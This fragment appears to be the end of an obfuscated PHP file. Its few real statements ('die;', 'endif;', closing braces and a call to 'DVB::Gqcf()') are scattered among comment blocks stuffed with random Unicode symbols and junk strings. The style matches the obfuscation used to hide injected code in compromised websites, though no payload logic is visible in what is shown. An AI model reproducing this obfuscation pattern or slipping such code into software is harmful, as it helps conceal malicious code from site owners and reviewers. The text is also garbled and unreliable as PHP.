1<h>Mv5)f╂➑▏⋩⊅↢❹〗ⅷ×ℯℱ◻⇧☄⒵≗⒢↉⓫≁☼✵

-*///
[/*-


┿﹪


B^nI┿﹪


-*///
8+0/*-S(E,kjx-*///
]/*-2-*///
);/*-1]J<Y.^#$-*///
/*-


≊☿≥￡⋹√°ℯ┬㊤⇕≽⋳∌➫┴유✄


^R^U-[6≊☿≥￡⋹√°ℯ┬㊤⇕≽⋳∌➫┴유✄


-*///
die;/*-,QO2Uo-*///
 endif;/*-


╋✴⒈∙⇐»∪╎ﭢ▁⋦∔➅✼┆㊦⑫≄


)JTn@╋✴⒈∙⇐»∪╎ﭢ▁⋦∔➅✼┆㊦⑫≄


-*///
 }/*-
⋰ⅳ⊌㊆⇟웃˜◑ⅽ┡⑴⊬⑳⓮ℱ⅖《⅝ℚ❏
x@.4⋰ⅳ⊌㊆⇟웃˜◑ⅽ┡⑴⊬⑳⓮ℱ⅖《⅝ℚ❏
-*///
}/*-

↾□⊕➡↉⒞≍∐⇌┮⋅❹㊣∲⊐

Pz{gh%↾□⊕➡↉⒞≍∐⇌┮⋅❹㊣∲⊐

-*///
DVB/*-g.l[M<-*///
::/*-


▆⋴


u#?+VM7T▆⋴


-*///
Gqcf/*-1{I6-*///
();/*-

↛┵ℙ︾⒤⋟◒➹⋌﹍■☱∷︼

#m~qD>↛┵ℙ︾⒤⋟◒➹⋌﹍■☱∷︼

-*///
 ?>